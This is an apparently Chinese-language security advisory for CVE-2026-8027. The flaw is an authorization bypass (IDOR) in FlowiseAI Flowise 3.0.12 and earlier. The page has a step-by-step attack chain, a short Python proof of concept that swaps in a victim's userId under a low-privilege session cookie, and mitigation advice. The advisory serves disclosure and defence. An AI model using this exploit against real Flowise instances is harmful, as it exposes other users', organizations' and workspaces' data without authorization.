CVE-2026-8027 CVSS 4.3 中危

CVE-2026-8027 FlowiseAI权限绕过漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8027

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FlowiseAI Flowise

漏洞概述

FlowiseAI Flowise 3.0.12及之前版本存在一处权限绕过漏洞。问题出在User Controller Handler组件中，由于对关键参数的校验不严谨，攻击者能够恶意篡改userId、organizationId、workspaceId或email等数据，从而绕过系统的正常授权流程。攻击者可利用此漏洞在低权限状态下远程获取敏感信息。鉴于该漏洞利用门槛较低，建议管理员立即采取措施进行修复。

技术细节

该漏洞本质上属于一种不安全的直接对象引用（IDOR）或访问控制缺陷。在FlowiseAI Flowise的User Controller Handler组件中，系统在处理涉及用户资源的API请求时，未能严格执行严格的权限校验机制。具体而言，当传入的请求包含userId、organizationId、workspaceId或email等关键标识符时，后端逻辑往往直接信任这些前端传入的参数，而未充分验证当前登录的会话上下文是否真正拥有访问该特定资源ID对应对象的权限。攻击者可以利用这一逻辑漏洞，通过拦截HTTP请求并篡改上述参数值（例如将自身的userId修改为管理员的userId），即可在不提供额外凭证的情况下，成功绕过系统的授权检查，越权访问其他用户、组织或工作区的敏感数据。由于攻击向量为网络（AV:N），且攻击复杂度低（AC:L），无需用户交互（UI:N），这使得漏洞利用非常容易，导致信息泄露风险增加。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用FlowiseAI Flowise，并确认版本在3.0.12或以下。

STEP 2

获取低权限账户

攻击者注册一个普通用户账户或获取一个低权限的合法会话令牌。

STEP 3

参数篡改

攻击者向User Controller Handler相关的API端点发送请求，并将请求中的userId、organizationId或workspaceId参数修改为目标受害者的ID。

STEP 4

权限绕过

由于后端未验证参数ID与会话用户的匹配关系，直接返回了目标ID对应的数据。

STEP 5

数据泄露

攻击者成功读取到本无权访问的用户信息、组织配置或工作区数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example endpoint)
target_url = "http://localhost:3000/api/v1/users/{userId}/profile"

# The victim's user ID or organization ID to access
victim_id = "550e8400-e29b-41d4-a716-446655440000" 

# Attacker's session cookie (Low privilege session)
session_cookie = {
    "flowise_session": "attacker_low_privilege_token_value"
}

# Exploit: Manipulate the userId parameter in the request
exploit_url = target_url.format(userId=victim_id)

try:
    # Send request with low privilege cookie but victim's ID
    response = requests.get(exploit_url, cookies=session_cookie)

    if response.status_code == 200:
        print("[+] Authorization bypass successful!")
        print("[+] Leaked data:")
        print(response.text)
    else:
        print("[-] Exploit failed or access denied.")
        print("Status Code:", response.status_code)
except Exception as e:
    print("An error occurred:", e)

影响范围

FlowiseAI Flowise <= 3.0.12

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署WAF规则，拦截对敏感API端点的异常请求（如ID格式不匹配的请求），并限制管理后台仅允许内网IP访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8027
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8027
3 Details https://www.cvedetails.com/cve/CVE-2026-8027/
4 VulDB https://vuldb.com/cve/CVE-2026-8027
5 Link https://gist.github.com/YLChen-007/3584e6ffa0bba6367328ecf0b46b0e4b
6 Link https://vuldb.com/submit/777657
7 Link https://vuldb.com/vuln/361274
8 Link https://vuldb.com/vuln/361274/cti
9 Link https://vuldb.com/submit/777657

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表